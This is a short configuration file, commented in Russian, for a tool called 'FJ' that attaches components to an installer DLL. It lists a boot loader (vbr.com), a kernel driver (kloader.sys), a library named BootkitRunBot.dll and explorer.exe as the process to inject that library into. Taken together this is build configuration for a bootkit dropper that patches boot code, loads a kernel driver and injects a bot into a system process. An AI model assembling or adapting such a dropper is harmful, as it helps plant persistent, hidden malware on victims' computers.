; Конфигурационный файл для утилиты FJ
; Описывает драйвера и библиотеки, которые необходимо прикрепить к инсталлеру
; При запуске инсталлер определяет разрядность ОС и устанавливает соответствующий драйвер

; Исходный файл инсталлера (может быть как EXE, так и DLL)
SOURCE: ..\bin\Release\i386\setupdll.dll

; Файл, в который будет записан результат 
OUT: Release\setupdll.dll

; Начальный загрузчик
BIN: Release\vbr.com

; Драйвер для 32х-битной ОС
DRV: ..\bin\Release\i386\kloader.sys


; Драйвер для 64х-битной ОС
;DRV: ..\bin\release\amd64\kloader.sys

; 32х-битная DLL
DLL: BootkitRunBot.dll
; Список процессов куда инжектить 32х битную DLL
explorer.exe
